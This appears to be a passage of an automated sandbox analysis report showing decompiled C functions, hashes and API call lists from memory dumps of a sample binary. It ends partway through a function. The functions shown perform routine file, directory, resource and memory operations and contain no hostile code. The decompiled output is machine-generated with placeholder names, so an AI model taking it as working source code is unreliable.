Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6ab4506b1d7a88d35a88369ddb174f5d7d669a55458652b15baf77c6cbf616da
Instruction ID: 0bf0738c9ace6297569e59e7ba4eebf9fd374feabd3dfcc72ac15a41c85834b8
Opcode Fuzzy Hash: 6ab4506b1d7a88d35a88369ddb174f5d7d669a55458652b15baf77c6cbf616da
Instruction Fuzzy Hash: 1B311431A04689EFDF24DF64C8809BE3BB4BF09310F1595AAE4648B291E336DD40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 10014761, Relevance: 6.1, APIs: 4, Instructions: 97
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10014761(void* __ecx, intOrPtr __edx, void* _a4, signed int _a8, signed short _a10) {
				signed short _v6;
				struct _FILETIME _v16;
				struct _SYSTEMTIME _v32;
				signed int _t43;
				intOrPtr _t52;
				void* _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int* _t68;
				void* _t69;
				void* _t70;

				_t67 = __edx;
				_t70 = __ecx;
				_t68 = __ecx + 0x70;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = 0;
				 *((char*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *_t68 = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				if(_a4 == 0 || _a4 == 0xffffffff) {
					return 0x10000;
				}
				if(SetFilePointer( *(__ecx + 4), 0, 0, 1) == 0xffffffff) {
					_t43 = _a8;
					 *_t68 =  *_t68 | 0xffffffff;
					 *((intOrPtr*)(_t70 + 0x4c)) = 0x80000000;
					if(_t43 != 0) {
						 *_t68 = _t43;
					}
					 *((char*)(_t70 + 0x6c)) = 0;
					GetLocalTime( &_v32);
					SystemTimeToFileTime( &_v32,  &_v16);
					E100141A7(_v16.dwLowDateTime, _v16.dwHighDateTime,  &_a10,  &_v6);
					 *((intOrPtr*)(_t70 + 0x50)) = E10014183(_v16.dwLowDateTime, _v16.dwHighDateTime);
					 *((intOrPtr*)(_t70 + 0x54)) = _t67;
					_t52 =  *((intOrPtr*)(_t70 + 0x50));
					_t65 = _t67;
					 *((intOrPtr*)(_t70 + 0x58)) = _t52;
					 *((intOrPtr*)(_t70 + 0x60)) = _t52;
					 *((intOrPtr*)(_t70 + 0x5c)) = _t65;
					 *((intOrPtr*)(_t70 + 0x64)) = _t65;
					 *(_t70 + 0x68) = (_a10 & 0x0000ffff) << 0x00000010 | _v6 & 0x0000ffff;
					 *(_t70 + 0x7c) = _a4;
					L5:
					return 0;
				}
				_t69 = _a4;
				_t61 = E10014204(_t69, _t70 + 0x4c, _t68, _t70 + 0x50, _t70 + 0x68);
				if(_t61 == 0) {
					SetFilePointer(_t69, 0, 0, 0);
					 *((char*)(_t70 + 0x6c)) = 1;
					 *(_t70 + 0x7c) = _t69;
					goto L5;
				}
				return _t61;
			}

0x10014761
0x10014769
0x10014771
0x10014774
0x10014777
0x1001477d
0x10014783
0x10014786
0x10014788
0x1001478e
0x10014791
0x00000000
0x1001486d
0x100147b1
0x100147ec
0x100147ef
0x100147f4
0x100147fb
0x100147fd
0x100147fd
0x10014802
0x10014806
0x10014814
0x10014828
0x10014838
0x1001483b
0x1001483e
0x10014841
0x10014843
0x10014846
0x1001484d
0x10014850
0x1001485f
0x10014865
0x100147e5
0x00000000
0x100147e5
0x100147bc
0x100147c4
0x100147ce
0x100147d8
0x100147de
0x100147e2
0x00000000
0x100147e2
0x10014876

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 100147A8
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,?,?,?,00000000), ref: 100147D8
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1001473E,00000000), ref: 10014806
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1001473E), ref: 10014814

Part of subcall function 10014204: GetFileInformationByHandle.KERNEL32(?,?), ref: 10014213

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: dcb650a7c6f3dce3048d40a5ecca93e30c78db1593e1cc2f66e55288c337022c
Instruction ID: a8375196beecc201186fe20b3ca971e2996defeecf043f8e4737544c8560e60c
Opcode Fuzzy Hash: dcb650a7c6f3dce3048d40a5ecca93e30c78db1593e1cc2f66e55288c337022c
Instruction Fuzzy Hash: 0A314FB5800B49AFD721CF69C8809ABBBF8FF08354F10492EE5A6D6660D770E985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004093A0(intOrPtr __ebx, void* __ebp, CHAR* _a4, void* _a8) {
				signed int _v4;
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				signed int _t18;
				int _t20;
				void* _t22;
				unsigned int _t23;
				signed int _t24;
				CHAR* _t27;
				intOrPtr _t33;
				void* _t36;
				void _t37;
				void _t38;
				signed int _t40;
				int _t43;
				char _t45;
				void* _t48;
				void* _t50;
				CHAR* _t51;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;
				signed int _t63;

				_t33 = __ebx;
				_t63 =  &_v524;
				_t18 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t18 ^ _t63;
				_t62 = _a8;
				_t51 = _a4;
				if(_t51 != 0 && GetFileAttributesA(_t51) == 0xffffffff) {
					CreateDirectoryA(_t51, 0);
				}
				_t20 =  *_t62;
				if(_t20 == 0) {
					L20:
					return E0042569C(_t20, _t33, _v4 ^ _t63, _t47, _t51, _t57);
				} else {
					_push(_t57);
					_t58 = _t62;
					_t36 = _t62;
					do {
						if(_t20 == 0x2f || _t20 == 0x5c) {
							_t58 = _t36;
						}
						_t20 =  *(_t36 + 1);
						_t36 = _t36 + 1;
					} while (_t20 != 0);
					if(_t58 != _t62) {
						_t60 = _t58 - _t62;
						E0042D2F0(_t33, _t51, _t60,  &_v264, _t62, _t60);
						 *((char*)(_t63 + _t60 + 0x124)) = 0;
						E004093A0(_t33, _t62, _t51,  &_v264);
						_t63 = _t63 + 0x14;
					}
					_v524 = 0;
					if(_t51 == 0) {
						L14:
						_t22 = _t62;
						_t48 = _t62;
						do {
							_t37 =  *_t22;
							_t22 = _t22 + 1;
						} while (_t37 != 0);
						_t23 = _t22 - _t48;
						_t53 =  &(( &_v524)[0xffffffffffffffff]);
						do {
							_t38 =  *(_t53 + 1);
							_t53 = _t53 + 1;
						} while (_t38 != 0);
						_t40 = _t23 >> 2;
						_t59 = _t48;
						_t24 = memcpy(_t53, _t59, _t40 << 2);
						_t47 =  &_v524;
						_t43 = _t24 & 0x00000003;
						memcpy(_t59 + _t40 + _t40, _t59, _t43);
						_t63 = _t63 + 0x18;
						_t51 = _t59 + _t43 + _t43;
						_t20 = GetFileAttributesA( &_v524);
						_pop(_t57);
						if(_t20 == 0xffffffff) {
							_t20 = CreateDirectoryA( &_v524, 0);
						}
						goto L20;
					} else {
						_t27 = _t51;
						_t50 =  &_v524 - _t51;
						do {
							_t45 =  *_t27;
							 *((char*)(_t50 + _t27)) = _t45;
							_t27 =  &(_t27[1]);
						} while (_t45 != 0);
						goto L14;
					}
				}
			}

0x004093a0
0x004093a0
0x004093a6
0x004093ad
0x004093b5
0x004093bd
0x004093c6
0x004093d7
0x004093d7
0x004093dd
0x004093e2
0x0040949d
0x004094b3
0x004093e8
0x004093e8
0x004093e9
0x004093eb
0x004093f0
0x004093f2
0x004093f8
0x004093f8
0x004093fa
0x004093fd
0x00409400
0x00409406
0x00409408
0x00409414
0x00409422
0x0040942a
0x0040942f
0x0040942f
0x00409434
0x00409439
0x0040944f
0x0040944f
0x00409451
0x00409453
0x00409453
0x00409455
0x00409458
0x00409460
0x00409462
0x00409465
0x00409465
0x00409468
0x0040946b
0x00409471
0x00409474
0x00409476
0x0040947a
0x0040947e
0x00409482
0x00409482
0x00409482
0x00409484
0x0040948d
0x0040948e
0x00409497
0x00409497
0x00000000
0x0040943b
0x0040943f
0x00409441
0x00409443
0x00409443
0x00409445
0x00409448
0x0040944b
0x00000000
0x00409443
0x00409439

APIs

GetFileAttributesA.KERNEL32(?,00000000,?), ref: 004093C9
CreateDirectoryA.KERNEL32(?,00000000), ref: 004093D7
GetFileAttributesA.KERNEL32(00000000), ref: 00409484
CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?), ref: 00409497

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 16599c5d7e1a4d2861d2bcc546c480b0a909018c5acf963481fb026ff9defe3e
Instruction ID: c1a67cf8a7cf7ceb0d6a47a22962de7bc20155c64eaee93742f5b09badc19805
Opcode Fuzzy Hash: 16599c5d7e1a4d2861d2bcc546c480b0a909018c5acf963481fb026ff9defe3e
Instruction Fuzzy Hash: 9F3146315083445BC7208F2CA8147EBB7A59FD6314F58866EF8A9973C2DB399C09C659

Uniqueness

Uniqueness Score: -1.00%

Function 00401C50, Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C50(intOrPtr* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				CHAR* _v8;
				void* _v12;
				signed short _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t24;
				intOrPtr _t27;
				void* _t34;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				CHAR* _t42;
				void* _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				struct HINSTANCE__* _t62;
				intOrPtr _t67;
				void* _t69;
				void* _t70;

				_push(__ebp);
				_t41 = __ecx;
				_t24 =  *__ecx;
				_t67 =  *((intOrPtr*)(_t24 - 0xc));
				_t45 = _a8;
				_t56 = _a4 - _t24;
				_t61 = _t45 + _t67;
				if((0x00000001 -  *((intOrPtr*)(_t24 - 4)) |  *((intOrPtr*)(_t24 - 8)) - _t61) < 0) {
					_push(_t61);
					E00401D80(__ecx, __ecx, _t56);
					_t45 = _a4;
				}
				_t27 =  *_t41;
				if(_t56 <= _t67) {
					_a4 = _t27 + _t56;
				}
				E00425DFA(_t41, _t45, _t27 + _t67, _t45, _a4, _t45);
				_t70 = _t69 + 0x10;
				if(_t61 < 0) {
					L7:
					_push(0x80070057);
					E00401D00(_t41, _t45, _t56, _t61, _t67);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v16 = _v16 & 0x0000ffff;
					_push(_t41);
					_t42 = _v8;
					__eflags = _t42 & 0xffff0000;
					_push(_t61);
					_push(_t56);
					_t57 = _t45;
					 *(_t57 + 0x58) = _t42;
					if(__eflags == 0) {
						__eflags =  *(_t57 + 0x54);
						if(__eflags == 0) {
							 *(_t57 + 0x54) = _t42 & 0x0000ffff;
						}
					}
					_t62 =  *(E0040E67F(_t42, _t57, _t61, __eflags) + 0xc);
					_t43 = LoadResource(_t62, FindResourceA(_t62, _t42, 5));
					_t34 = E0040C9A0(_t57, _t43,  *((intOrPtr*)(_t70 + 0x18)), _t62);
					FreeResource(_t43);
					return _t34;
				} else {
					_t38 =  *_t41;
					if(_t61 >  *((intOrPtr*)(_t38 - 8))) {
						goto L7;
					} else {
						 *((intOrPtr*)(_t38 - 0xc)) = _t61;
						_t39 =  *_t41;
						 *((char*)(_t61 + _t39)) = 0;
						return _t39;
					}
				}
			}

APIs

_memcpy_s.LIBCMT ref: 00401C9C

Part of subcall function 00401D80: _memcpy_s.LIBCMT ref: 00401E17

FindResourceA.KERNEL32(?,00000034,00000005), ref: 0040CA05
LoadResource.KERNEL32(?,00000000,?,?,00000030,004136DE,?), ref: 0040CA0D
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,00000030,004136DE,?), ref: 0040CA25

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$_memcpy_s$FindFreeLoad
String ID:
API String ID: 3154194310-0
Opcode ID: 67fa323749841caeb3f779f8e4837c1c80f0c8590dfa05056c431ee4b62cbdaa
Instruction ID: bb8511196ae9bfc1f8b33b24d5ec206f76bae843889eda254133b9ea0f7c68cd
Opcode Fuzzy Hash: 67fa323749841caeb3f779f8e4837c1c80f0c8590dfa05056c431ee4b62cbdaa
Instruction Fuzzy Hash: 5B21C172A05610AFD700EF19DC88E5BF7E9EF98354F00456EF540A7361D778AC058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6D6, Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000F6D6(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L10015806();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}

0x1000f6da
0x1000f6e3
0x1000f6fa
0x1000f6ff
0x1000f704
0x1000f707
0x1000f709
0x1000f70c
0x1000f740
0x1000f743
0x1000f74c
0x1000f751
0x1000f75a
0x1000f75e
0x1000f75e
0x1000f760
0x1000f76a
0x1000f76c
0x1000f794
0x1000f797
0x1000f79a
0x1000f79f
0x1000f7a2
0x1000f7a5
0x1000f7a8
0x1000f7ab
0x1000f7b8
0x1000f7b8
0x1000f774
0x1000f777
0x1000f779
0x1000f77f
0x1000f783
0x1000f786
0x1000f789
0x1000f78c
0x1000f78c
0x1000f7be
0x1000f7c0
0x00000000
0x1000f7c0
0x1000f711
0x00000000
0x00000000
0x1000f72c
0x1000f731
0x1000f748
0x00000000
0x1000f748
0x1000f733
0x00000000
0x1000f6ef
0x1000f6f2
0x1000f739
0x1000f739
0x1000f7c2
0x1000f7c6
0x1000f7c6

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,1001098D,00000000,?,00000001), ref: 1000F726
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,1001098D,00000000,?,00000001,000000FF,10011545,00000000), ref: 1000F751
#823.MFC42(00000020,?,?,00000000,00000000,00000140,?,1001098D,00000000,?,00000001,000000FF,10011545,00000000,?,00000000), ref: 1000F760
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,1001098D,00000000,?,00000001,000000FF,10011545), ref: 1000F7B2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Pointer$#823Create
String ID:
API String ID: 3407337251-0
Opcode ID: 5e1a32609303f1a546a80ffbb8244456b4145d16fc764a9ef8e44fc192a14e8a
Instruction ID: 66dd4b91f3c2848326e10d4da734fbba7feac23233bbd13dddf1e840793dcce3
Opcode Fuzzy Hash: 5e1a32609303f1a546a80ffbb8244456b4145d16fc764a9ef8e44fc192a14e8a
Instruction Fuzzy Hash: A831D435108385AFE721CF688880BAEBBE5EF05390F10895DF89997641C3B1AD45DB22

Uniqueness

Uniqueness Score: -1.00%

Function 0041B86C, Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041B86C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t76;
				intOrPtr* _t78;
				signed int _t81;
				void* _t83;
				void* _t84;

				_t84 = __eflags;
				_t76 = __edx;
				_push(0x20);
				E004271DA(E0043ABFA, __ebx, __edi, __esi);
				_t81 = 0;
				 *((intOrPtr*)(_t83 - 0x10)) = 0;
				 *((intOrPtr*)(_t83 - 0x14)) = 0x43f410;
				_t68 =  *((intOrPtr*)(_t83 + 8));
				_t71 = _t83 - 0x1c;
				 *(_t83 - 4) = 0;
				E0040E6CB(_t83 - 0x1c, _t84,  *((intOrPtr*)(_t68 - 0xb0)));
				_t78 =  *((intOrPtr*)(_t83 + 0x14));
				 *(_t83 - 4) = 1;
				if((0 | _t78 != 0x00000000) == 0) {
					E00415838(_t71);
				}
				 *_t78 = _t81;
				if( *((intOrPtr*)(_t68 - 8)) == _t81) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E004140EE(_t68, _t76, _t78, _t81, __eflags);
					__eflags = _t51 - _t81;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t81) {
						goto L3;
					} else {
						__eflags =  *(_t83 + 0xc) - _t81;
						if( *(_t83 + 0xc) != _t81) {
							IntersectRect(_t83 - 0x2c, _t68 - 0x9c,  *(_t83 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t78 =  *((intOrPtr*)(_t83 + 0x14));
							_t81 = 0;
						}
						E004143AD(_t83 - 0x14, _t78, _t83, CreateRectRgnIndirect(_t83 - 0x2c));
						E00413EBA( *((intOrPtr*)(_t68 - 8)), _t83 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t81;
						if(_t69 != _t81) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t83 - 0x18)) - _t81;
						 *_t78 = _t70;
						 *(_t83 - 4) = 0;
						if( *((intOrPtr*)(_t83 - 0x18)) != _t81) {
							_push( *((intOrPtr*)(_t83 - 0x1c)));
							_push(_t81);
							E0040DF8F();
						}
						 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t83 - 0x14)) = 0x43de94;
						E00414400(_t83 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t83 - 4) = 0;
					if( *((intOrPtr*)(_t83 - 0x18)) != _t81) {
						_push( *((intOrPtr*)(_t83 - 0x1c)));
						_push(_t81);
						E0040DF8F();
					}
					 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t83 - 0x14)) = 0x43de94;
					E00414400(_t83 - 0x14);
					_t53 = 0x80004005;
				}
				return E004272B2(_t53);
			}

APIs

__EH_prolog3.LIBCMT ref: 0041B873

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetDC.USER32(?), ref: 0041B8F1
IntersectRect.USER32 ref: 0041B92B
CreateRectRgnIndirect.GDI32(?), ref: 0041B935

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
String ID:
API String ID: 3511876931-0
Opcode ID: 2541bdbd50b41508b6b6a0c022eb074156aadf2da7e1fc31466aebedd9e90a54
Instruction ID: 6c8177e3c42cdfbe7fce3bcbb5394a75abb5b2bcbcd446f29c35724b48bf6920
Opcode Fuzzy Hash: 2541bdbd50b41508b6b6a0c022eb074156aadf2da7e1fc31466aebedd9e90a54
Instruction Fuzzy Hash: BC316071D0021ADFCF11DFA4C585AEEBB75EF18704F10805BE511AB291C7785E86CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420C45, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00420C45(void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t63 = __edx;
				_t51 = E0040E6B2(_t50, __edi, _t67, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t64);
					_t65 =  *((intOrPtr*)(E0040E67F(_t51, _t64, 0, _t76) + 4));
					_t69 = E00416DE8(0x450cbc);
					if(_t69 == 0 || _t65 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t69 + 0xc));
						_t79 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t65 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t69 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t82 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E00429DE3(_t51, _t63, _t65, _t69, _t82);
									_push( *((intOrPtr*)(_t69 + 0xc)));
									_a4 = _t39;
									E00426256(_t51, _t63, _t65, _t69, _t82);
								}
								_t37 = E00426490(_t51, _t63, _t65, _t69,  *((intOrPtr*)(_t65 + 0x98)));
								 *((intOrPtr*)(_t69 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t69 + 0xc)) = E00426490(_t51, _t63, _t65, _t69, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E00429DE3(_t51, _t63, _t65, _t69, _t79) >=  *((intOrPtr*)(_t65 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E0040D088();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t76 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E00420B79( *((intOrPtr*)(_t51 + 0x20)), _t64);
				E00420B79( *((intOrPtr*)(_t51 + 0x1c)), _t64);
				E00420B79( *((intOrPtr*)(_t51 + 0x18)), _t64);
				E00420B79( *((intOrPtr*)(_t51 + 0x14)), _t64);
				E00420B79( *((intOrPtr*)(_t51 + 0x24)), _t64);
				goto L8;
			}

0x00420c45
0x00420c45
0x00420c4f
0x00420c51
0x00420c58
0x00420d30
0x00420d3b
0x00420d3b
0x00420c5e
0x00420c61
0x00420c64
0x00000000
0x00000000
0x00420c6d
0x00420cb1
0x00420cb1
0x00420cb7
0x00420cc4
0x00420cc8
0x00420d2f
0x00000000
0x00420cce
0x00420cce
0x00420cd1
0x00420cd3
0x00420ce4
0x00420ceb
0x00420ced
0x00420cf0
0x00420cf4
0x00420cf6
0x00420cf8
0x00420cf9
0x00420cfe
0x00420d01
0x00420d04
0x00420d0a
0x00420d11
0x00420d19
0x00420d1c
0x00420d2c
0x00420d2c
0x00420d1c
0x00000000
0x00420ceb
0x00420cd5
0x00420ce2
0x00000000
0x00000000
0x00000000
0x00420ce2
0x00420cc8
0x00420c73
0x00420c75
0x00420c7c
0x00420c7e
0x00420c81
0x00420c83
0x00420c87
0x00420c87
0x00420c83
0x00420c7c
0x00420c8c
0x00420c94
0x00420c9c
0x00420ca4
0x00420cac
0x00000000

APIs

__msize.LIBCMT ref: 00420CD6
__msize.LIBCMT ref: 00420CF9
_malloc.LIBCMT ref: 00420D11
_malloc.LIBCMT ref: 00420D26

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 0814ffe629b0e26a2ffb4583dde071c2631ed8b770a417dd10b823b3f2cf7e5a
Instruction ID: 2c0f6476db5fa24d72c34f31a5f5d0d07ea1d9ca555583005a90796c0f08a82f
Opcode Fuzzy Hash: 0814ffe629b0e26a2ffb4583dde071c2631ed8b770a417dd10b823b3f2cf7e5a
Instruction Fuzzy Hash: 32217A317112249FD729AFB2F88555B77D5AF04758B94896FE8088A253DF38EC50C78C

Uniqueness

Uniqueness Score: -1.00%

Function 00424DC1, Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00424DC1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
